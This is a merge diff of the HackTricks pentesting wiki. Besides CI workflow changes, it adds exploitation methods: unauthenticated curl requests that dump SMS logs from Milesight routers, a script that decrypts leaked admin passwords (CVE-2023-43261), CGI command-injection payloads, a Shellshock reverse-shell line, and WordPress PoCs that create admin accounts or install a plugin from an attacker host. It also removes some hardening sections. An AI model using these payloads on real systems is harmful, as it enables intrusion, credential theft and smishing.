Merge pull request #1460 from HackTricks-wiki/update_Silent_Smishing__The_Hidden_Abuse_of_Cellular_Rout_20251001_130854

Silent Smishing The Hidden Abuse of Cellular Router APIs

.github/workflows/build_master.yml

@@ -43,7 +43,7 @@ jobs:
           && sudo apt update \
           && sudo apt install gh -y
       
-      - name: Publish search index release asset
+      - name: Push search index to hacktricks-searchindex repo
         shell: bash
         env:
           PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
@@ -51,43 +51,99 @@ jobs:
           set -euo pipefail
 
           ASSET="book/searchindex.js"
-          TAG="searchindex-en"
+          TARGET_REPO="HackTricks-wiki/hacktricks-searchindex"
-          TITLE="Search Index (en)"
+          FILENAME="searchindex-en.js"
 
           if [ ! -f "$ASSET" ]; then
             echo "Expected $ASSET to exist after build" >&2
             exit 1
           fi
 
-          TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
+          TOKEN="${PAT_TOKEN}"
           if [ -z "$TOKEN" ]; then
-            echo "No token available for GitHub CLI" >&2
+            echo "No PAT_TOKEN available" >&2
             exit 1
           fi
-          export GH_TOKEN="$TOKEN"
 
-          # Delete the release if it exists
+          # Clone the searchindex repo
-          echo "Checking if release $TAG exists..."
+          git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo
-          if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then
+          
-            echo "Release $TAG already exists, deleting it..."
+          cd /tmp/searchindex-repo
-            gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || {
+          git config user.name "GitHub Actions"
-              echo "Failed to delete release, trying without cleanup-tag..."
+          git config user.email "github-actions@github.com"
-              gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || {
+          
-                echo "Warning: Could not delete existing release, will try to recreate..."
+          # Compress the searchindex file
-              }
+          cd "${GITHUB_WORKSPACE}"
-            }
+          gzip -9 -k -f "$ASSET"
-            sleep 2  # Give GitHub API a moment to process the deletion
+          
+          # Show compression stats
+          ORIGINAL_SIZE=$(wc -c < "$ASSET")
+          COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz")
+          RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
+          echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
+          
+          # Copy the .gz version to the searchindex repo
+          cd /tmp/searchindex-repo
+          cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz"
+          
+          # Stage the updated file
+          git add "${FILENAME}.gz"
+          
+          # Commit and push with retry logic
+          if git diff --staged --quiet; then
+            echo "No changes to commit"
           else
-            echo "Release $TAG does not exist, proceeding with creation..."
+            TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC")
+            git commit -m "Update searchindex files - ${TIMESTAMP}"
+            
+            # Retry push up to 20 times with pull --rebase between attempts
+            MAX_RETRIES=20
+            RETRY_COUNT=0
+            while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do
+              if git push origin master; then
+                echo "Successfully pushed on attempt $((RETRY_COUNT + 1))"
+                break
+              else
+                RETRY_COUNT=$((RETRY_COUNT + 1))
+                if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then
+                  echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..."
+                  
+                  # Try normal rebase first
+                  if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then
+                    echo "Rebase successful, retrying push..."
+                  else
+                    # If rebase fails due to divergent histories (orphan branch reset), re-clone
+                    if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then
+                      echo "Detected history rewrite, re-cloning repository..."
+                      cd /tmp
+                      rm -rf searchindex-repo
+                      git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo
+                      cd searchindex-repo
+                      git config user.name "GitHub Actions"
+                      git config user.email "github-actions@github.com"
+                      
+                      # Re-copy the .gz version
+                      cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz"
+                      
+                      git add "${FILENAME}.gz"
+                      TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC")
+                      git commit -m "Update searchindex files - ${TIMESTAMP}"
+                      echo "Re-cloned and re-committed, will retry push..."
+                    else
+                      echo "Rebase failed for unknown reason, retrying anyway..."
+                    fi
+                  fi
+                  
+                  sleep 1
+                else
+                  echo "Failed to push after $MAX_RETRIES attempts"
+                  exit 1
+                fi
+              fi
+            done
           fi
           
-          # Create new release (with force flag to overwrite if deletion failed)
+          echo "Successfully pushed searchindex files"
-          gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || {
-            echo "Failed to create release, trying with force flag..."
-            gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true
-            sleep 2
-            gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY"
-          }
 
 
       # Login in AWs

.github/workflows/translate_all.yml

@@ -129,7 +129,7 @@ jobs:
           git pull
           MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
       
-      - name: Publish search index release asset
+      - name: Push search index to hacktricks-searchindex repo
         shell: bash
         env:
           PAT_TOKEN: ${{ secrets.PAT_TOKEN }}
@@ -137,31 +137,93 @@ jobs:
           set -euo pipefail
 
           ASSET="book/searchindex.js"
-          TAG="searchindex-${BRANCH}"
+          TARGET_REPO="HackTricks-wiki/hacktricks-searchindex"
-          TITLE="Search Index (${BRANCH})"
+          FILENAME="searchindex-${BRANCH}.js"
 
           if [ ! -f "$ASSET" ]; then
             echo "Expected $ASSET to exist after build" >&2
             exit 1
           fi
 
-          TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}"
+          TOKEN="${PAT_TOKEN}"
           if [ -z "$TOKEN" ]; then
-            echo "No token available for GitHub CLI" >&2
+            echo "No PAT_TOKEN available" >&2
             exit 1
           fi
-          export GH_TOKEN="$TOKEN"
 
-          # Delete the release if it exists
+          # Clone the searchindex repo
-          if gh release view "$TAG" >/dev/null 2>&1; then
+          git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo
-            echo "Release $TAG already exists, deleting it..."
-            gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY"
-          fi
           
-          # Create new release
+          # Compress the searchindex file
-          gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for $BRANCH" --repo "$GITHUB_REPOSITORY"
+          gzip -9 -k -f "$ASSET"
+          
+          # Show compression stats
+          ORIGINAL_SIZE=$(wc -c < "$ASSET")
+          COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz")
+          RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}")
+          echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)"
+          
+          # Copy ONLY the .gz version to the searchindex repo (no uncompressed .js)
+          cp "${ASSET}.gz" "/tmp/searchindex-repo/${FILENAME}.gz"
+          
+          # Commit and push with retry logic
+          cd /tmp/searchindex-repo
+          git config user.name "GitHub Actions"
+          git config user.email "github-actions@github.com"
+          git add "${FILENAME}.gz"
+          
+          if git diff --staged --quiet; then
+            echo "No changes to commit"
+          else
+            git commit -m "Update ${FILENAME} from hacktricks-cloud build"
+            
+            # Retry push up to 20 times with pull --rebase between attempts
+            MAX_RETRIES=20
+            RETRY_COUNT=0
+            while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do
+              if git push origin master; then
+                echo "Successfully pushed on attempt $((RETRY_COUNT + 1))"
+                break
+              else
+                RETRY_COUNT=$((RETRY_COUNT + 1))
+                if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then
+                  echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..."
+                  
+                  # Try normal rebase first
+                  if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then
+                    echo "Rebase successful, retrying push..."
+                  else
+                    # If rebase fails due to divergent histories (orphan branch reset), re-clone
+                    if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then
+                      echo "Detected history rewrite, re-cloning repository..."
+                      cd /tmp
+                      rm -rf searchindex-repo
+                      git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo
+                      cd searchindex-repo
+                      git config user.name "GitHub Actions"
+                      git config user.email "github-actions@github.com"
+                      
+                      # Re-copy ONLY the .gz version (no uncompressed .js)
+                      cp "${ASSET}.gz" "${FILENAME}.gz"
+                      
+                      git add "${FILENAME}.gz"
+                      git commit -m "Update ${FILENAME}.gz from hacktricks-cloud build"
+                      echo "Re-cloned and re-committed, will retry push..."
+                    else
+                      echo "Rebase failed for unknown reason, retrying anyway..."
+                    fi
+                  fi
+                  
+                  sleep 1
+                else
+                  echo "Failed to push after $MAX_RETRIES attempts"
+                  exit 1
+                fi
+              fi
+            done
+          fi
 
-      # Login in AWs
+      # Login in AWS
       - name: Configure AWS credentials using OIDC
         uses: aws-actions/configure-aws-credentials@v3
         with:

src/README.md

@@ -226,7 +226,7 @@ https://www.lasttowersolutions.com/
 
 ### [K8Studio - The Smarter GUI to Manage Kubernetes.](https://k8studio.io/)
 
-<figure><img src="images/k8studio.jpg" alt="k8studio logo"><figcaption></figcaption></figure>
+<figure><img src="images/k8studio.png" alt="k8studio logo"><figcaption></figcaption></figure>
 
 K8Studio IDE empowers DevOps, DevSecOps, and developers to manage, monitor, and secure Kubernetes clusters efficiently. Leverage our AI-driven insights, advanced security framework, and intuitive CloudMaps GUI to visualize your clusters, understand their state, and act with confidence.
 

src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md

@@ -247,6 +247,73 @@ Mitigations:
 - Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.
 
 ---
+
+## 10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)
+
+Abusing exposed web APIs of industrial cellular routers enables stealthy, carrier-origin smishing at scale. Milesight UR-series routers expose a JSON-RPC–style endpoint at `/cgi`. When misconfigured, the API can be queried without authentication to list SMS inbox/outbox and, in some deployments, to send SMS.
+
+Typical unauthenticated requests (same structure for inbox/outbox):
+
+```http
+POST /cgi HTTP/1.1
+Host: <router>
+Content-Type: application/json
+
+{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }
+```
+
+```json
+{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }
+```
+
+Responses include fields such as `timestamp`, `content`, `phone_number` (E.164), and `status` (`success` or `failed`). Repeated `failed` sends to the same number are often attacker “capability checks” to validate that a router/SIM can deliver before blasting.
+
+Example curl to exfiltrate SMS metadata:
+
+```bash
+curl -sk -X POST http://<router>/cgi \
+  -H 'Content-Type: application/json' \
+  -d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'
+```
+
+Notes on auth artifacts:
+- Some traffic may include an auth cookie, but a large fraction of exposed devices respond without any authentication to `query_inbox`/`query_outbox` when the management interface is Internet-facing.
+- In environments requiring auth, previously-leaked credentials (see below) restore access.
+
+Credential recovery path – CVE-2023-43261:
+- Affected families: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
+- Issue: web-served logs (e.g., `httpd.log`) are reachable unauthenticated under `/lang/log/` and contain admin login events with the password encrypted using a hardcoded AES key/IV present in client-side JavaScript.
+- Practical access and decrypt:
+
+```bash
+curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
+# Look for entries like: {"username":"admin","password":"<base64>"}
+```
+
+Minimal Python to decrypt leaked passwords (AES-128-CBC, hardcoded key/IV):
+
+```python
+import base64
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import unpad
+KEY=b'1111111111111111'; IV=b'2222222222222222'
+enc_b64='...'  # value from httpd.log
+print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())
+```
+
+Hunting and detection ideas (network):
+- Alert on unauthenticated `POST /cgi` whose JSON body contains `base`/`function` set to `query_inbox` or `query_outbox`.
+- Track repeated `POST /cgi` bursts followed by `status":"failed"` entries across many unique numbers from the same source IP (capability testing).
+- Inventory Internet-exposed Milesight routers; restrict management to VPN; disable SMS features unless required; upgrade to ≥ v35.3.0.7; rotate credentials and review SMS logs for unknown sends.
+
+Shodan/OSINT pivots (examples seen in the wild):
+- `http.html:"rt_title"` matches Milesight router panels.
+- Google dorking for exposed logs: `"/lang/log/system" ext:log`.
+
+Operational impact: using legitimate carrier SIMs inside routers gives very high SMS deliverability/credibility for phishing, while inbox/outbox exposure leaks sensitive metadata at scale.
+
+---
+
 ## Detection Ideas
 1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**.
 2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs.
@@ -263,5 +330,8 @@ Mitigations:
 - [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
 - 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
 - 3GPP TS 33.501 – Security architecture and procedures for 5G System
+- [Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
+- [CVE-2023-43261 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-43261)
+- [CVE-2023-43261 PoC (win3zz)](https://github.com/win3zz/CVE-2023-43261)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}

src/generic-methodologies-and-resources/phishing-methodology/README.md

@@ -579,6 +579,37 @@ clipboard-hijacking.md
 mobile-phishing-malicious-apps.md
 {{#endref}}
 
+### Mobile‑gated phishing to evade crawlers/sandboxes
+Operators increasingly gate their phishing flows behind a simple device check so desktop crawlers never reach the final pages. A common pattern is a small script that tests for a touch-capable DOM and posts the result to a server endpoint; non‑mobile clients receive HTTP 500 (or a blank page), while mobile users are served the full flow.
+
+Minimal client snippet (typical logic):
+
+```html
+<script src="/static/detect_device.js"></script>
+```
+
+`detect_device.js` logic (simplified):
+
+```javascript
+const isMobile = ('ontouchstart' in document.documentElement);
+fetch('/detect', {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({is_mobile:isMobile})})
+  .then(()=>location.reload());
+```
+
+Server behaviour often observed:
+- Sets a session cookie during the first load.
+- Accepts `POST /detect {"is_mobile":true|false}`.
+- Returns 500 (or placeholder) to subsequent GETs when `is_mobile=false`; serves phishing only if `true`.
+
+Hunting and detection heuristics:
+- urlscan query: `filename:"detect_device.js" AND page.status:500`
+- Web telemetry: sequence of `GET /static/detect_device.js` → `POST /detect` → HTTP 500 for non‑mobile; legitimate mobile victim paths return 200 with follow‑on HTML/JS.
+- Block or scrutinize pages that condition content exclusively on `ontouchstart` or similar device checks.
+
+Defence tips:
+- Execute crawlers with mobile‑like fingerprints and JS enabled to reveal gated content.
+- Alert on suspicious 500 responses following `POST /detect` on newly registered domains.
+
 ## References
 
 - [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
@@ -586,6 +617,7 @@ mobile-phishing-malicious-apps.md
 - [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/)
 - [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
 - [2025 Unit 42 Global Incident Response Report – Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/)
+- [Silent Smishing – mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
 
 {{#include ../../banners/hacktricks-training.md}}
 

src/linux-hardening/privilege-escalation/README.md

@@ -83,7 +83,7 @@ You can check if the sudo version is vulnerable using this grep.
 sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
 ```
 
-#### sudo < v1.28
+#### sudo < v1.8.28
 
 From @sickrov
 

src/network-services-pentesting/pentesting-web/cgi.md

@@ -59,11 +59,37 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt
 > run
 ```
 
-## **Proxy \(MitM to Web server requests\)**
+## Centralized CGI dispatchers (single endpoint routing via selector parameters)
 
-CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com"
+Many embedded web UIs multiplex dozens of privileged actions behind a single CGI endpoint (for example, `/cgi-bin/cstecgi.cgi`) and use a selector parameter such as `topicurl=<handler>` to route the request to an internal function.
 
-As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**" and if the server performs any request during the session. You will be able to capture each request made by the server.
+Methodology to exploit these routers:
+
+- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, or unpack firmware and grep for handler strings used by the dispatcher.
+- Test unauthenticated reachability: some handlers forget auth checks and are directly callable.
+- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`.
+
+Generic exploit shapes:
+
+```http
+POST /cgi-bin/cstecgi.cgi HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+
+# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools
+topicurl=<handler>&param=-n
+
+# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell
+topicurl=setEasyMeshAgentCfg&agentName=;id;
+
+# 3) Validator bypass → arbitrary file write in file-touching handlers
+topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc
+```
+
+Detection and hardening:
+
+- Watch for unauthenticated requests to centralized CGI endpoints with `topicurl` set to sensitive handlers.
+- Flag parameters that begin with `-` (argv option injection attempts).
+- Vendors: enforce authentication on all state-changing handlers, validate using strict allowlists/types/lengths, and never pass user-controlled strings as command-line flags.
 
 ## Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)
 
@@ -80,8 +106,14 @@ curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:500
 
 **More info about the vuln and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
 
+## **Proxy \(MitM to Web server requests\)**
+
+CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com"
+
+As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**" and if the server performs any request during the session. You will be able to capture each request made by the server.
+
+## **References**
+
+- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-web/web-api-pentesting.md

@@ -28,6 +28,53 @@ Pentesting APIs involves a structured approach to uncovering vulnerabilities. Th
 - **Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing.
 - **Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions.
 
+### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls
+
+Modern TypeScript stacks commonly use tRPC with Zod for input validation. In tRPC, `protectedProcedure` typically ensures the request has a valid session (authentication) but does not imply the caller has the right role/permissions (authorization). This mismatch leads to Broken Function Level Authorization/BOLA if sensitive procedures are only gated by `protectedProcedure`.
+
+- Threat model: Any low-privileged authenticated user can call admin-grade procedures if role checks are missing (e.g., background migrations, feature flags, tenant-wide maintenance, job control).
+- Black-box signal: `POST /api/trpc/<router>.<procedure>` endpoints that succeed for basic accounts when they should be admin-only. Self-serve signups drastically increase exploitability.
+- Typical tRPC route shape (v10+): JSON body wrapped under `{"input": {...}}`.
+
+Example vulnerable pattern (no role/permission gate):
+
+```ts
+// The endpoint for retrying a migration job
+// This checks for a valid session (authentication)
+retry: protectedProcedure
+  // but not for an admin role (authorization).
+  .input(z.object({ name: z.string() }))
+  .mutation(async ({ input, ctx }) => {
+    // Logic to restart a sensitive migration
+  }),
+```
+
+Practical exploitation (black-box)
+
+1) Register a normal account and obtain an authenticated session (cookies/headers).
+2) Enumerate background jobs or other sensitive resources via “list”/“all”/“status” procedures.
+
+```bash
+curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.all' \
+  -H 'Content-Type: application/json' \
+  -b '<AUTH_COOKIES>' \
+  --data '{"input":{}}'
+```
+
+3) Invoke privileged actions such as restarting a job:
+
+```bash
+curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.retry' \
+  -H 'Content-Type: application/json' \
+  -b '<AUTH_COOKIES>' \
+  --data '{"input":{"name":"<migration_name>"}}'
+```
+
+Impact to assess
+
+- Data corruption via non-idempotent restarts: Forcing concurrent runs of migrations/workers can create race conditions and inconsistent partial states (silent data loss, broken analytics).
+- DoS via worker/DB starvation: Repeatedly triggering heavy jobs can exhaust worker pools and database connections, causing tenant-wide outages.
+
 ### **Tools and Resources for API Pentesting**
 
 - [**kiterunner**](https://github.com/assetnote/kiterunner): Excellent for discovering API endpoints. Use it to scan and brute force paths and parameters against target APIs.
@@ -53,8 +100,6 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 ## References
 
 - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire)
+- [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/network-services-pentesting/pentesting-web/wordpress.md

@@ -447,15 +447,6 @@ Detection checklist
 - Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers.
 - Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values.
 
-Hardening
-
-- Never derive authentication or authorization from client-controlled headers.
-- If a reverse proxy must inject identity, terminate trust at the proxy and strip inbound copies (e.g., `unset X-Wcpay-Platform-Checkout-User` at the edge), then pass a signed token and verify it server-side.
-- For REST routes performing privileged actions, require `current_user_can()` checks and a strict `permission_callback` (do NOT use `__return_true`).
-- Prefer first-party auth (cookies, application passwords, OAuth) over header “impersonation”.
-
-References: see the links at the end of this page for a public case and broader analysis.
-
 ### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0)
 
 WordPress themes and plugins frequently expose AJAX handlers through the `wp_ajax_` and `wp_ajax_nopriv_` hooks.  When the **_nopriv_** variant is used **the callback becomes reachable by unauthenticated visitors**, so any sensitive action must additionally implement:
@@ -511,31 +502,6 @@ Other impactful targets include plugin/theme `.php` files (to break security plu
 * Concatenation of unsanitised user input into paths (look for `$_POST`, `$_GET`, `$_REQUEST`).
 * Absence of `check_ajax_referer()` and `current_user_can()`/`is_user_logged_in()`.
 
-#### Hardening
-
-```php
-function secure_remove_font_family() {
-    if ( ! is_user_logged_in() ) {
-        wp_send_json_error( 'forbidden', 403 );
-    }
-    check_ajax_referer( 'litho_fonts_nonce' );
-
-    $fontfamily = sanitize_file_name( wp_unslash( $_POST['fontfamily'] ?? '' ) );
-    $srcdir = trailingslashit( wp_upload_dir()['basedir'] ) . 'litho-fonts/' . $fontfamily;
-
-    if ( ! str_starts_with( realpath( $srcdir ), realpath( wp_upload_dir()['basedir'] ) ) ) {
-        wp_send_json_error( 'invalid path', 400 );
-    }
-    // … proceed …
-}
-add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_family' );
-//  🔒  NO wp_ajax_nopriv_ registration
-```
-
-> [!TIP]
-> **Always** treat any write/delete operation on disk as privileged and double-check:
-> • Authentication  • Authorisation  • Nonce  • Input sanitisation  • Path containment (e.g. via `realpath()` plus `str_starts_with()`).
-
 ---
 
 ### Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role")
@@ -565,12 +531,6 @@ Why it’s exploitable
 - If a user previously had higher privileges saved in `_asenha_view_admin_as_original_roles` and was downgraded, they can restore them by hitting the reset path.
 - In some deployments, any authenticated user could trigger a reset for another username still present in `viewing_admin_as_role_are` (broken authorization).
 
-Attack prerequisites
-
-- Vulnerable plugin version with the feature enabled.
-- Target account has a stale high-privilege role stored in user meta from earlier use.
-- Any authenticated session; missing nonce/capability on the reset flow.
-
 Exploitation (example)
 
 ```bash
@@ -591,21 +551,6 @@ Detection checklist
   - Modify roles via `add_role()` / `remove_role()` without `current_user_can()` and `wp_verify_nonce()` / `check_admin_referer()`.
   - Authorize based on a plugin option array (e.g., `viewing_admin_as_role_are`) instead of the actor’s capabilities.
 
-Hardening
-
-- Enforce capability checks on every state-changing branch (e.g., `current_user_can('manage_options')` or stricter).
-- Require nonces for all role/permission mutations and verify them: `check_admin_referer()` / `wp_verify_nonce()`.
-- Never trust request-supplied usernames; resolve the target user server-side based on the authenticated actor and explicit policy.
-- Invalidate “original roles” state on profile/role updates to avoid stale high-privilege restoration:
-
-```php
-add_action( 'profile_update', function( $user_id ) {
-    delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' );
-}, 10, 1 );
-```
-
-- Consider storing minimal state and using time-limited, capability-guarded tokens for temporary role switches.
-
 ---
 
 ### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder “sf-booking”)
@@ -852,6 +797,123 @@ Patched behaviour (Jobmonster 4.8.0)
 
 - Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']).
 
+## Unauthenticated privilege escalation via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82)
+
+Some plugins expose REST endpoints that mint reusable “connection keys” or tokens without verifying the caller’s capabilities. If the route authenticates only on a guessable attribute (e.g., username) and does not bind the key to a user/session with capability checks, any unauthenticated attacker can mint a key and invoke privileged actions (admin account creation, plugin actions → RCE).
+
+- Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection
+- Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback
+- Impact: full takeover by chaining the minted key to internal privileged actions
+
+PoC – mint a connection key and use it
+
+```bash
+# 1) Obtain key (unauthenticated). Exact payload varies per plugin
+curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/connection/create-wp-connection" \
+  -H 'Content-Type: application/json' \
+  --data '{"username":"admin"}'
+# → {"key":"<conn_key>", ...}
+
+# 2) Call privileged plugin action using the minted key (namespace/route vary per plugin)
+curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/users" \
+  -H 'Content-Type: application/json' \
+  -H 'X-Connection-Key: <conn_key>' \
+  --data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}'
+```
+
+Why it’s exploitable
+- Sensitive REST route protected only by low-entropy identity proof (username) or missing permission_callback
+- No capability enforcement; minted key is accepted as a universal bypass
+
+Detection checklist
+- Grep plugin code for register_rest_route(..., [ 'permission_callback' => '__return_true' ])
+- Any route that issues tokens/keys based on request-supplied identity (username/email) without tying to an authenticated user or capability
+- Look for subsequent routes that accept the minted token/key without server-side capability checks
+
+Hardening
+- For any privileged REST route: require permission_callback that enforces current_user_can() for the required capability
+- Do not mint long-lived keys from client-supplied identity; if needed, issue short-lived, user-bound tokens post-authentication and recheck capabilities on use
+- Validate the caller’s user context (wp_set_current_user is not sufficient alone) and reject requests where !is_user_logged_in() || !current_user_can(<cap>)
+
+---
+
+## Nonce gate misuse → unauthenticated arbitrary plugin installation (FunnelKit Automations ≤ 3.5.3)
+
+Nonces prevent CSRF, not authorization. If code treats a nonce pass as a green light and then skips capability checks for privileged operations (e.g., install/activate plugins), unauthenticated attackers can meet a weak nonce requirement and reach RCE by installing a backdoored or vulnerable plugin.
+
+- Vulnerable path: plugin/install_and_activate
+- Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce “passes”
+- Impact: full compromise via arbitrary plugin install/activation
+
+PoC (shape depends on plugin; illustrative only)
+
+```bash
+curl -i -s -X POST https://victim.tld/wp-json/<fk-namespace>/plugin/install_and_activate \
+  -H 'Content-Type: application/json' \
+  --data '{"_nonce":"<weak-pass>","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}'
+```
+
+Detection checklist
+- REST/AJAX handlers that modify plugins/themes with only wp_verify_nonce()/check_admin_referer() and no capability check
+- Any code path that sets $skip_caps = true after nonce validation
+
+Hardening
+- Always treat nonces as CSRF tokens only; enforce capability checks regardless of nonce state
